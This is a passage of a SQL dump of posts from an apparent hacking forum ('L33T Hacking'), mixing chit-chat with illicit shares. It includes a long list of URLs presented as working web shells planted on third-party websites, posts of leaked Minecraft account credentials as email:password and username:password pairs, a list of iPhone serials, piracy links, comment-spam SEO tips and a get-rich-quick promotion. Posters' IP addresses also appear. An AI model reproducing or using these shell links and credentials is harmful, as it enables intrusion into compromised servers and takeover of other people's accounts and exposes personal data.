Grabber\r\n*Quick Guide (6 pages)\r\n\r\nDon\'t forget to say thanks \r\n\r\nDownload: http://www.mediafire.com/?tba27zio2136bne', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'b5d6f4394095b8dba324f2afe810aa82', '0', '0'); INSERT INTO mybb_posts VALUES('6730', '1152', '0', '21', 'Private Hard Hitting Shells', '0', '9', 'p420', '1351657971', 'Theses are all checked.\r\n\r\n[b]Brand New made by me[/b]\r\n\r\nhttp://www.phero404.us/private/404.php\r\n http://www.phero404.us/private/lol.php\r\n http://www.phero404.us/private/boobs.php\r\n http://www.phero404.us/private/shell.php\r\n http://www.phero404.us/private/xbox.php\r\n\r\n[b]Not made by me[/b]\r\n[code]\r\nhttp://173.201.177.81/wp-content/themes/...en/404.php\r\n http://174.120.140.164/wp-content/themes...en/404.php\r\n http://178.251.194.190/wp-content/themes...en/404.php\r\n http://nafsiahasa.com/up/x.php\r\n http://antik.si/cache/ssu/products/c.php\r\n http://161.139.194.77/webdav/shell74205.php\r\n http://ragersfantasy.com/bigbb.php\r\n http://161.139.194.77/webdav/shell38452.php\r\n http://201.144.204.153/grn.php\r\n http://161.139.194.77/webdav/shell74205.php\r\n http://kaodenuit.free.fr/post.php\r\n http://www.nafsiahasa.com/up/x.php\r\n http://gabriel-vores-engel.dk/404.php\r\n http://yogevbarans.my3gb.com/red.php\r\n http://kinderfysiotherapieconnyoortwijn.nl/404.php\r\n http://visualfoodplanner.com/404.php\r\n http://charminarconnection.org/js/Client...ts/pp1.php\r\n http://67.55.108.101/\r\n http://82.233.159.108/swerve.php\r\n http://buchsermusic.org/js/ClientAPITests/pp4.php\r\n http://62.119.49.36/webdav/hak.php\r\n http://200.37.255.246/webdav/shell.php\r\n http://74.81.64.77/\r\n http://kroll.dk/Shell.php\r\n http://tolva.dk/Shell.php\r\n http://www.atwservice.com/media.php\r\n http://engstroem.com/Shell.php\r\n http://220.132.241.53/webdav/lol.php\r\n http://174.120.140.164/wp-content/themes...en/404.php\r\n http://178.251.194.190/wp-content/themes...en/404.php\r\n http://nafsiahasa.com/up/x.php\r\n http://antik.si/cache/ssu/products/c.php\r\n http://161.139.194.77/webdav/shell74205.php\r\n http://www.jrnickz.com/help.php\r\n http://erbil.at/js/jquery.php\r\n http://mmx2.webs.com/shell.php\r\n http://mmx1.webs.com/shell.php\r\n http://mapi.co.kr/zb41pl7/bbs/data/mapi_...ttings.php\r\n http://94.94.216.82/grn.php\r\n[/code]', '72.231.24.165', '1223104677', '0', '0', '9', '1351658072', '1', '784b39616739c0f9f00df5c1ad2559c6', '0', '1351658072'); INSERT INTO mybb_posts VALUES('6731', '1152', '6730', '21', 'RE: Private Hard Hitting Shells', '0', '257', 'XxTREYZxX', '1351658233', 'Thanks for this great share LOl', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'b176b6957ba90288ee02b9a5c4632a1b', '0', '0'); INSERT INTO mybb_posts VALUES('6736', '1086', '6316', '75', 'RE: Skyrim Cheats and tips', '0', '262', 'RAND0M1ZER', '1351659566', 'A buddy of mine has a youtube channel with plenty of Skyrim videos, some of his vids are pretty good\n\nCheck it out: http://www.youtube.com/user/fatalmaverick?feature=g-user-s', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '740935f958567d0757404e94f5c6f8ed', '0', '0'); INSERT INTO mybb_posts VALUES('6733', '1153', '0', '64', 'Watch Prison Break full online for free', '0', '9', 'p420', '1351658400', 'Here is a great site to watch all prison break episodes.\n\nLink: http://www.free-tv-video-online.me/internet/prison_break/\n\n[b]Prison Break[/b]\n\n[b]Description: [/b]An engineer (Wentworth Miller) installs himself in a prison he helped design, in order to help his brother (Dominic Purcell), a death-row inmate who insists he did not commit the crime for which he has been sentenced to die and help him escape.\n\nLincoln Burrows is on death row for the murder of the vice president\'s brother. He insists he\'s innocent and only his brother Michael Scofield believes him. As an engineer who helped design the prison where Lincoln is being held, Michael takes drastic measures to help his brother. He gets himself arrested and sent to the same prison so that with his knowledge of the building the two of them can escape together. However, while inside, Michael discovers a massive conspiracy that is determined to see Lincoln\'s sentence carried out. Breaking out will be more difficult than he thought, but he\'s still going to try. \n\n[b]Season(s):[/b] 4\n\n[b]Genres:[/b] Action, Crime, Drama', '72.231.24.165', '1223104677', '0', '0', '9', '1351658422', '1', '048f0b0b2cb8399c140b7d62e957e9e1', '0', '1351658422'); INSERT INTO mybb_posts VALUES('6734', '1154', '0', '43', 'Iphone 5 serials', '0', '9', 'p420', '1351658625', 'Here\'s some iPhone 5 serials by A?????x™\r\n\r\nEnjoy.\r\n \r\n\r\n[code]\r\n\r\nC37J9SRDDTWD\r\n C37J9SXDDTWD\r\n C37J9SFDDTWD\r\n C37J9STDDTWD\r\n C37J9SSDDTWD\r\n C37J9SYDDTWD\r\n C37J9SCDDTWD\r\n C37J9SBDDTWD\r\n C37J9SVDDTWD\r\n C37J9SVUDTWD\r\n C37J9SWUDTWD\r\n C37J9GWUDTWD\r\n C37J9GEUDTWD\r\n C38J9GEUDTWD\r\n C38J9EEUDTWD\r\n C38J9EEUDTWF\r\n C38J9YEUDTWF\r\n C38J9HEUDTWF\r\n C38J9JEUDTWF\r\n C38J9JEUDTWG\r\n C38J9JEUDTWD\r\n C38J9JESDTWD\r\n C38J9CESDTWD\r\n C38J9CEPDTWD\r\n C38J9CWPDTWD\r\n C38J9EWPDTWD\r\n C35J9EWPDTWD\r\n C36J9EWPDTWD\r\n C37J9EWPDTWD\r\n C38J9EWPDTWD\r\n C38J8EWPDTWD\r\n C38J8PWPDTWD\r\n C38J8DWPDTWD\r\n C38J8DPPDTWD\r\n C38J8DPDDTWD\r\n C38J8DPWDTWD\r\n C38J8DRWDTWD\r\n C38J8DRWDTWF\r\n C38J8DRCDTWF\r\n C38J8DRBDTWF\r\n C38J8DRUDTWF\r\n C38J8DRQDTWF\r\n C38J8DRGDTWF\r\n C38J8DRZDTWF\r\n C38J8DRNDTWF\r\n C38J9DRGDTWF\r\n C38J9DEGDTWF\r\n C38J7DFGDTWF\r\n C38J7PRGDTWF\r\n C38J7PCCDTWF\r\n C38J7ACGDTWF\r\n C38J7BCGDTWF\r\n C38J7ZCGDTWF\r\n C38J7HCGDTWF\r\n C38J7TCGDTWF\r\n C38J7XCPDTWF\r\n C38J7XCADTWF\r\n C38J7XCBDTWF\r\n C38J7XCHDTWF\r\n C38J7XCYDTWF\r\n C38J7XCRDTWF\r\n C38J7XDRDTWF\r\n C38J7XCCDTWF\r\n C39J7XCUDTWF\r\n C39J7XCPDTWF\r\n C39J7ZCPDTWF\r\n C39J7WCPDTWF\r\n C38J7WCPDTWF\r\n C38J7WCCDTWF\r\n C38J7WPCDTWF\r\n C38J7W3CDTWF\r\n C38J7W2CDTWF\r\n C38J7W3CDTWF\r\n C38J7W4CDTWF\r\n C38J7W5CDTWF\r\n C38J7W7CDTWF\r\n C38J7WQCDTWF\r\n C38J731CDTWF\r\n C38J711CDTWF\r\n C38J721CDTWF\r\n C38J751CDTWF\r\n C38J771CDTWF\r\n C38J871CDTWF\r\n C38J872CDTWF\r\n[/code]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '639162e76ec3a7d83c0e327d8b1bfc7a', '0', '0'); INSERT INTO mybb_posts VALUES('6735', '1143', '6705', '24', 'RE: NEED HELP', '0', '9', 'p420', '1351659445', 'Maybe someone is hitting you offline?\n\nAlso if you have an anti-virus then disable their firewall. That\'s what happens to me the most my internet gets limited access and it blocks chrome so it shows webpage unable sign everytime and check your windows firewall and allow ur internet browser.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'befb17c016d19463aeb1a0302cb3e56a', '0', '0'); INSERT INTO mybb_posts VALUES('6737', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '1', 't3h jok3r', '1351659596', 'I agree with the OP. I also bought this game and honestly it\'s a waste of money, I appreciate you for posting this warning.', '72.231.24.165', '1223104677', '1', '0', '1', '1351659616', '1', 'a1b89e2c5273a5273922a47d5f78ecf2', '0', '1351659616'); INSERT INTO mybb_posts VALUES('6738', '1155', '0', '3', 'Happy Halloween', '0', '1', 't3h jok3r', '1351660263', 'Happy Halloween everyone. First halloween of L33T Hacking!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '00e3d14a1255041530c72021a937502d', '0', '0'); INSERT INTO mybb_posts VALUES('6739', '1143', '6705', '24', 'RE: NEED HELP', '0', '257', 'XxTREYZxX', '1351661746', 'Could you please help me do this like a step by step on how to do this thanks for your time', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '440d18ec13139ccf30fc3a1d44422f47', '0', '0'); INSERT INTO mybb_posts VALUES('6740', '1155', '6738', '3', 'RE: Happy Halloween', '0', '257', 'XxTREYZxX', '1351662309', 'Thanks you joker and happy holloween to you to ,are you doing anything.', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'ce5d7f24347561f4feac1569553bbd62', '0', '0'); INSERT INTO mybb_posts VALUES('6741', '1086', '6316', '75', 'RE: Skyrim Cheats and tips', '0', '257', 'XxTREYZxX', '1351662607', 'I might check out but i don\'t play skyrim anymore so yeah :O', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '10805bac45cbdfc4664d557db7cfd5c9', '0', '0'); INSERT INTO mybb_posts VALUES('6742', '1153', '6733', '64', 'RE: Watch Prison Break full online for free', '0', '257', 'XxTREYZxX', '1351662925', 'i Already knew this site but thanks for the share anyway :O', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '00f93cdf4126218cf484dec88ed820e6', '0', '0'); INSERT INTO mybb_posts VALUES('6743', '1156', '0', '64', 'Walking dead', '0', '257', 'XxTREYZxX', '1351663300', 'Hey guys if you love the walking dead tv series and want to watch all of the go to this site where you can download them so yeah enjoy :L\r\nhttp://www.free-tv-video-online.me/internet/the_walking_dead/season_1.html\r\n\r\n\r\nenjoy', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '6b1c320f05401a5074321bc31b856aae', '0', '0'); INSERT INTO mybb_posts VALUES('6744', '1157', '0', '74', '[1.4.X] Minecraft Nodus Force Op [Direct Link][Not Patched 10/30/12]', '0', '257', 'XxTREYZxX', '1351663724', 'Sorry closed this thread :(', '203.104.11.9', '-882373879', '1', '0', '257', '1351663787', '1', '4fcdb3b5764050d7b350989d8ad1071a', '0', '1351663787'); INSERT INTO mybb_posts VALUES('6745', '1158', '0', '74', 'A few minecraft accounts that might work', '0', '257', 'XxTREYZxX', '1351664983', 'Hey guys Here are some account\'s that might work.\r\nI found them from different places. Hope you enjoy! \r\n[No survey\'s] \r\n\r\ngilig26@aim.com:wewewe \r\njanis1197@inbox.lv:vikings455 \r\nben.malin@hotmail.com:Hotdog123 \r\njquilty@uk2.net:bentley \r\ntaylor.leigh@ymail.com:baseball \r\nthijs.bastiaens@hotmail.com:148818 \r\n\r\nI\'ll try and find more and post them here! Enjoy! and also post some of your account\'s you found here.', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2c07d7c0a0ce2857aa8d97af7dbed4c4', '0', '0'); INSERT INTO mybb_posts VALUES('6746', '1159', '0', '74', 'More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351665158', 'Front2battle:12345wow\r\nGobbyer:Bissemaatt1\r\nJaeroll:1ragnarok\r\nhyzor:duffman92\r\nGabbychick:243900evans\r\ngasman0606:bowser55\r\nillidan064:064galatar\r\nFerguson86:2364107prf\r\ndrue123:hanna123\r\nftbigfoot:Password1\r\nherakleion:01fe02de\r\nForsiss:1234qwer\r\nGaaraisbest:Dragon09\r\nhagenation:purple123\r\nHispaghost:4g0st3r0\r\ngilian1993:nailig123\r\nhardmike:michael88\r\nFerretz2:1q2w3e4r\r\nFrankthegank:7y8nuzap\r\nfrostdan:qwertydan2004\r\njimskill4:prono1337\r\nhansrocks125125:drago125125', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '621cedb05d1c709b540c8e7a09794e9f', '0', '0'); INSERT INTO mybb_posts VALUES('6952', '1166', '6930', '46', 'RE: [Guide] Reporting Phishing Pages', '0', '1', 't3h jok3r', '1351917769', '[quote=\'sirchamp\' pid=\'6930\' dateline=\'1351890232\']\r\n[quote]l33thacking.net then the phished URL would be l33thacking.net [/quote]\r\nI dont see any difference there.\r\n[/quote]\r\n\r\nMy bad. l33thacking.c0m auto changes to l33thacking.net', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '9eb881fc2691dc52ab22353cf63bda5f', '0', '0'); INSERT INTO mybb_posts VALUES('6748', '1155', '6738', '3', 'RE: Happy Halloween', '0', '205', 'mothered', '1351681029', 'I don\'t celebrate It In my locality, but for those who do, wishing you all a very happy day.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f6ff035807319bdb2c36e63f6485f071', '0', '0'); INSERT INTO mybb_posts VALUES('6749', '1155', '6738', '3', 'RE: Happy Halloween', '0', '228', 'VirtualLegend', '1351684179', 'Happy Halloween To All LH Members', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f96a4793238646c0055d90acf6b64210', '0', '0'); INSERT INTO mybb_posts VALUES('6750', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '228', 'VirtualLegend', '1351684232', '30/10 Sexy Ass Totidile', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5b5c2a85e70e10ed97b17c7e20f20109', '0', '0'); INSERT INTO mybb_posts VALUES('6751', '1147', '6716', '9', 'RE: BRAIN FREEZE - Moneymaking Method', '0', '228', 'VirtualLegend', '1351684291', 'What is it about? Can you put more information about it?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ca6725a4409f115f49a2ffbfd895279c', '0', '0'); INSERT INTO mybb_posts VALUES('6752', '1097', '6358', '9', 'RE: Monetizing e-book', '0', '228', 'VirtualLegend', '1351684387', 'Is it a GPT Site? or something else?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e25c1bab1d1d148c4086f67269900d74', '0', '0'); INSERT INTO mybb_posts VALUES('6753', '1155', '6738', '3', 'RE: Happy Halloween', '0', '61', 'NXK', '1351684422', 'Happy Halloween everyone, We\'ve made it this far. Can\'t wait for next years.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '09661af4e21eb29ddc52bfb124e9bd7a', '0', '0'); INSERT INTO mybb_posts VALUES('6754', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '228', 'VirtualLegend', '1351684514', 'I don\'t like the game ether, my friend has it', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a69b96f0a04c611ecba9111824fef177', '0', '0'); INSERT INTO mybb_posts VALUES('6755', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '302', 'Mac Miller', '1351686628', 'Welcome man this is a great site hope you stay active!!', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', '9308b5b2029776953f5be659270bd2f5', '0', '0'); INSERT INTO mybb_posts VALUES('6756', '1155', '6738', '3', 'RE: Happy Halloween', '0', '302', 'Mac Miller', '1351686670', 'Happy Haloween and i hope this site is up for a long time!!!', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', '43e36f040c502cc8c1678dca65d9c469', '0', '0'); INSERT INTO mybb_posts VALUES('6757', '1160', '0', '9', '? Ebay Gold Digger System ? [ Highly Recommended ]', '0', '228', 'VirtualLegend', '1351692573', '[align=center][img]http://img17.imageshack.us/img17/4516/ebaywsosalesletter.jpg[/img]\r\n\r\n[b][color=#FF0000][size=x-large]New Money Making System Reveals How To Build A Super-Responsive Email List By Using The Power Of eBay & Opening The Doors To A Constant Flow Of Hot \"Ready-To-Buy\" Leads At No Cost! [/size][/color][/b]\r\n\r\n[b][color=#32CD32][size=medium]These are buyers wanting & waiting anxiously to buy more stuff from YOU![/size][/color][/b]\r\n\r\nDear Internet Marketer Friend,\r\n\r\n[color=#FFFFFF][size=small]Gone are the times when you could get \'cheap\' qualified leads for cents; we all know that, but what if I tell you that I\'ve been getting hot leads for nothing! you read it well! I\'ve been getting hot buying leads that are buying what I want to sell them over and over again, to make it more clear for you I\'m constantly building super-responsive email list that love to get emails from me!\r\n\r\nI\'ll share this secret with YOU because I realised that there is no way for this system to get saturated and I want to help you to make money asap![/size][/color]\r\n\r\n[color=#32CD32][size=medium][b]Wait! Read this:[/b][/size][/color]\r\n\r\n[size=medium][color=#FF0000][b]This is NOT about:[/b][/color][/size]\r\n\r\n[color=#FFFFFF][size=small]X Dropshiping.\r\nX Making a living from eBay directly.\r\nX Selling stuff on eBay to make money (you wont make good money on eBay but you will from them).\r\nX A Step by Step guide in how to use eBay... or even worst in how to create an account! \r\nX A short term strategy.\r\nX A push button system that will make you rich.\r\nX Doing nothing and making money over night.\r\n\r\nIf you are thinking on getting any of those you better look somewhere else![/size][/color]\r\n\r\n[b][color=#32CD32][size=medium]What is it then?[/size][/color][/b]\r\n\r\n[color=#FFFFFF][size=small]What I\'m offering you is a proven system that works and that will allow you to make money on a regular basis, you can grow super-fast using this system and make $1000\'s per day...in the end it will be up to you. \r\n\r\nWe are going to use the power of eBay to get their more valuable asset: their buyers!\r\n\r\nIn other words, I\'m giving you the power to build ultra-responsive targeted lists that will buy stuff from you every time you email them![/size][/color]\r\n\r\n[color=#32CD32][size=medium][b]But, I know nothing about eBay! [/b][/size][/color]\r\n\r\n[color=#FFFFFF][size=small]That\'s ok because the concepts to build your list & the software are very easy to apply & use (newbie friendly).[/size][/color]\r\n\r\n[color=#FFD700][b][size=x-large]Download Link:[/size][/b][/color]\r\n[quote][url=http://adfoc.us/9383011537780]Click Here To Download[/url][/quote][/align]\r\n\r\n[b][color=#FFD700][size=x-large][align=center]For More Information Go to the Sales Page:[/align][/size][/color][/b]\r\n[quote][url=http://www.warriorforum.com/warrior-special-offers-forum/698769-ebay-list-building-system-software-get-hot-leads-cero-cost-while-others-pay-100s-them.html][align=center]Click Here For The Sales Page[/align][/url][/quote]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '33bbd14e02f595a6a58d61505a9a1f0f', '0', '0'); INSERT INTO mybb_posts VALUES('6758', '1161', '0', '65', '????? YIFY Torrents ?????', '0', '228', 'VirtualLegend', '1351693111', '[color=#FFFFFF][size=small][align=left]Hello People :P,\r\n\r\nToday I Want to show you a good torrent site with the best HQ Movies. I\'m NOT ADVERTSING !!!, It\'s just that i want to share a good site where you can download almost every movie. I\'m using it for years and I\'m still satisfied with the Quality of the site. If you are a Utorrent or Bittorrent user than i would recommend this site, if you know more sites like these post it below!\r\n\r\nSite:[url=http://yify-torrents.com/] http://yify-torrents.com/[/url]\r\n[/align][/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ef280c804946062cfbaeffc22425e9b8', '0', '0'); INSERT INTO mybb_posts VALUES('6759', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '264', 'D?ea', '1351696414', 'I can easily drink 5 cans at a night, and nothing happns to me.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '71c70fb035bd18cf66f595c2c9813cdd', '0', '0'); INSERT INTO mybb_posts VALUES('6760', '1124', '6549', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '264', 'D?ea', '1351696461', '[quote=\'iTzIpod\' pid=\'6549\' dateline=\'1351457019\']\r\nI remember that there once was a man selling his virginity online and the bid was like $7,000,000+\r\nHe was a body builder.\r\n\r\nI may be wrong. :p\r\n[/quote]\r\nDamn I would have made a bid :roflol:', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'b351356e438c70beb6ea5470e64b83b7', '0', '0'); INSERT INTO mybb_posts VALUES('6761', '1124', '6541', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '228', 'VirtualLegend', '1351696612', '[align=center][img]http://i1.kym-cdn.com/entries/icons/original/000/006/707/nothing-to-do-here-template.jpg.scaled500.jpg[/img][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a5e0187aec7729bbfe4d0f281105d0f0', '0', '0'); INSERT INTO mybb_posts VALUES('6762', '1124', '6541', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '302', 'Mac Miller', '1351696675', 'Damn i should say im a virgin and try to get money lol.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '7229c141bbcffa80f3c34b19a51c7def', '0', '0'); INSERT INTO mybb_posts VALUES('6763', '1136', '6597', '47', 'RE: C++ Tutorial Givaway', '0', '228', 'VirtualLegend', '1351696689', 'No Problem\n\nRead the rules before posting something to prevent this :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ddae4545941bef55e42e3d2b12102c8e', '0', '0'); INSERT INTO mybb_posts VALUES('6764', '1162', '0', '12', 'Rank your YouTube videos to Number #1', '0', '228', 'VirtualLegend', '1351696998', '[color=#FFFFFF][size=medium]* DEDICATED GMAIL: Go to Google and set\r\nup a new G account and put your videos keyword/s in the g address with your\r\nniche as the username.\r\n\r\n* KEYWORD ENHANCED USERNAME: Next, head over to Youtube and open up a NEW\r\naccount. Choose a user name that has the same keyword/s as your new email\r\naddress (Your videos keyword/s). This is most important for step 3. Use your\r\nnew G address as your Google account to connect your Youtube account to. Now\r\nyou should have a newly registered account with your keyword/s as the user\r\nname. This username is about to be used as anchor text for linking to your vid.\r\n\r\n\r\n\r\n* PROMOTION: Upload your 1 video to this new account and NEVER upload another\r\nvideo to this account ever again. Here’s why…\r\n\r\n\r\nOnce you have uploaded your video you will see it featured on the top of your\r\nYoutube channel page. This is where Youtube features your latest video upload.\r\nAny link juice that flows on to your channel page will only benefit the video\r\nin that “Featured Box” so it is important that your new video be the only one\r\nthat is ever there. Next we are going to quickly (under an hour) send masses of\r\nPR4-PR7 Do-Follow back links to your channel page which will act as instant\r\nback links for your video.\r\n\r\n\r\nBACKLINKING: Go to the search box at the top of the Youtube page and do a\r\nsearch for your keyword. This should bring back pages of results. Go through\r\nthe results and click on each videos user name to visit their channel.\r\n\r\n\r\nYou are looking for channels with PR4 or better.\r\n\r\n\r\nWhen you find one just leave a comment on their channel (Bottom of their\r\nchannel page) and you will see your keyword anchor text show up as your\r\nusername next to your comment. Comments do not have to mention your keyword\r\nagain and do not need to be relevant to your niche so just say something nice.\r\nThis anchor text from these comments is DO FOLLOW and will provide INSTANT high\r\nquality link juice straight to whatever video is in the featured spot on your\r\nchannel page.\r\n\r\n\r\nThe more you add the better your video will do !\r\n\r\n\r\nAfter 24 hours do a search for your keyword again on Youtube and you should\r\ngenerally see it in the top 10 after this short amount of time.\r\n\r\n[/size][/color]\r\n\r\n[u][b][color=#32CD32][size=x-large]Credits to reazahmed[/size][/color][/b][/u]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6835d492b6869b8681e42e744018b631', '0', '0'); INSERT INTO mybb_posts VALUES('6765', '1091', '6688', '56', 'RE: Rate the avatar above you', '0', '302', 'Mac Miller', '1351697402', '[quote=\'iTzIpod\' pid=\'6688\' dateline=\'1351624893\']\r\n?/10\r\nI don\'t know who that is.. :p\r\nI also don\'t really like listening to Mac Miller. :(\r\n[/quote]\r\n\r\nIt\'s Mac Miller lol\r\nand 9/10 Flashing Monkey is epic :O', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', 'c026d135b90593c79023bb26d96890b9', '0', '0'); INSERT INTO mybb_posts VALUES('6766', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '302', 'Mac Miller', '1351698117', 'Good Hope you guys like them and to people who already like them. Golf Wang lol.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '85e3e46c810920d4eb0973f7b45ec770', '0', '0'); INSERT INTO mybb_posts VALUES('6767', '1143', '6705', '24', 'RE: NEED HELP', '0', '67', 'HoverCatz', '1351699647', 'Disable Hamachi. Hamachi sometimes \"steals\" your internet', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '3fbcb740bf3c47651ebccdc293d06e1a', '0', '0'); INSERT INTO mybb_posts VALUES('6768', '1163', '0', '35', 'You Like it ? [ Rate My Graphic ]', '0', '228', 'VirtualLegend', '1351700732', '[color=#FFFFFF][size=medium]What do you think about my new signature ?\r\n\r\n- Do i Need to add more stuff to it?\r\n- Make it bigger?\r\n- Give me some tips [/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '98dcd025b607703160f64fd822a87698', '0', '0'); INSERT INTO mybb_posts VALUES('6769', '1155', '6738', '3', 'RE: Happy Halloween', '0', '53', 'sirchamp', '1351703827', 'Happy Halloween. Time pasts so fast...', '7.29.48.243', '119353587', '1', '0', '0', '0', '1', 'c350626f6c1f98df75d6571526adb401', '0', '0'); INSERT INTO mybb_posts VALUES('6770', '1155', '6738', '3', 'RE: Happy Halloween', '0', '222', 'Exposé', '1351704137', 'Happy Halloween bitches.....:D', '74.76.78.78', '1246514766', '1', '0', '0', '0', '1', '9f4d0a31ec771884a14057ed3d799259', '0', '0'); INSERT INTO mybb_posts VALUES('6771', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '67', 'HoverCatz', '1351708493', 'Im Very good making servers, as i live coding them.', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'ebf1da2c4d2578d935a57fc0da175e1a', '0', '0'); INSERT INTO mybb_posts VALUES('6772', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '67', 'HoverCatz', '1351708596', 'I already bought 10 copies o.o jk', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'e34f5b976258356eb35c48e625c3769d', '0', '0'); INSERT INTO mybb_posts VALUES('6773', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '67', 'HoverCatz', '1351708812', '3/10 unclear image, can barely see who it is. is he showing his finger or holding an object?', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '5771e7dad276cd32fd3dbb33045e5fda', '0', '0'); INSERT INTO mybb_posts VALUES('6774', '951', '6771', '71', 'RE: L33thacking Minecraft Server', '0', '228', 'VirtualLegend', '1351710047', '[quote=\'HoverCatz\' pid=\'6771\' dateline=\'1351708493\']\r\nIm Very good making servers, as i live coding them.\r\n[/quote]\r\n\r\nOkay If everyone has time we will be making a server', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '014dbbb228339c9137590c53c1008031', '0', '0'); INSERT INTO mybb_posts VALUES('6775', '1148', '6718', '30', 'RE: [Crack] Limitless Logger 6.7 !!', '0', '228', 'VirtualLegend', '1351710493', 'What for program is it? Can you put more info about it', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '09cb43824c92b88b325c832738c90ef3', '0', '0'); INSERT INTO mybb_posts VALUES('6776', '1142', '6684', '24', 'RE: Fuck you Internet Explorer', '0', '82', 'iTzIpod', '1351715123', 'I use Google Chrome instead. It loads fast and looks simple and easy to use.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '359c0d2d9dc3e2d9246cf737ac14d7d1', '0', '0'); INSERT INTO mybb_posts VALUES('6777', '1144', '6706', '11', 'RE: What can you do with?', '0', '82', 'iTzIpod', '1351715159', 'You can boot their IP Address offline, you can track down their location.. You can do somewhat a lot of things with it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5614017a49c4d8899269035f5381be9', '0', '0'); INSERT INTO mybb_posts VALUES('6778', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1351715254', 'Yeah and the OP said that it\'s premium though too.\nIt\'s not.\nIt just allows you to call people in a group chat and share screen in a group chat with 2 or more people.\nSkype Premium allows you to call people and text people via SMS. But this doesn\'t allow it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '784a5387a1c8b98f5fb1368993ff36d3', '0', '0'); INSERT INTO mybb_posts VALUES('6779', '1152', '6730', '21', 'RE: Private Hard Hitting Shells', '0', '82', 'iTzIpod', '1351715286', 'Nice share! Thanks a lot for your contribution! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e258cb01bd22b57fffad4dd9d12ab00b', '0', '0'); INSERT INTO mybb_posts VALUES('6780', '1153', '6733', '64', 'RE: Watch Prison Break full online for free', '0', '82', 'iTzIpod', '1351715353', 'Thanks for the share! I\'ll share this with my friend who wants a Netflix account but won\'t buy it for $1.25 :p\nSo I\'ll be nice and give him this link.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '763145fec0876146338a61ba476f26ae', '0', '0'); INSERT INTO mybb_posts VALUES('6781', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '82', 'iTzIpod', '1351715454', 'Why would we post some accounts we found here when we can make a new thread each time? :p\nIt will increase the forum\'s activity to be honest.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '061e62290cf39464d0335c9bcbacb6fe', '0', '0'); INSERT INTO mybb_posts VALUES('6782', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351715557', 'Nice share. But I don\'t need any accounts right now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a472980a0680509c484b11005c358371', '0', '0'); INSERT INTO mybb_posts VALUES('6783', '1143', '6705', '24', 'RE: NEED HELP', '0', '82', 'iTzIpod', '1351715729', 'It\'s probably Hurricane Sandy, if not, try contacting your ISP. Unless, someone is hitting you offline. I don\'t know.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '96bddec3b842ac63c765c0e24d385ef7', '0', '0'); INSERT INTO mybb_posts VALUES('6784', '1163', '6768', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '82', 'iTzIpod', '1351715790', 'It\'s alright. I like the font! :p \nCould add more work to it though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68be668710c04ea5057fcd7207a4a2b4', '0', '0'); INSERT INTO mybb_posts VALUES('6785', '1155', '6738', '3', 'RE: Happy Halloween', '0', 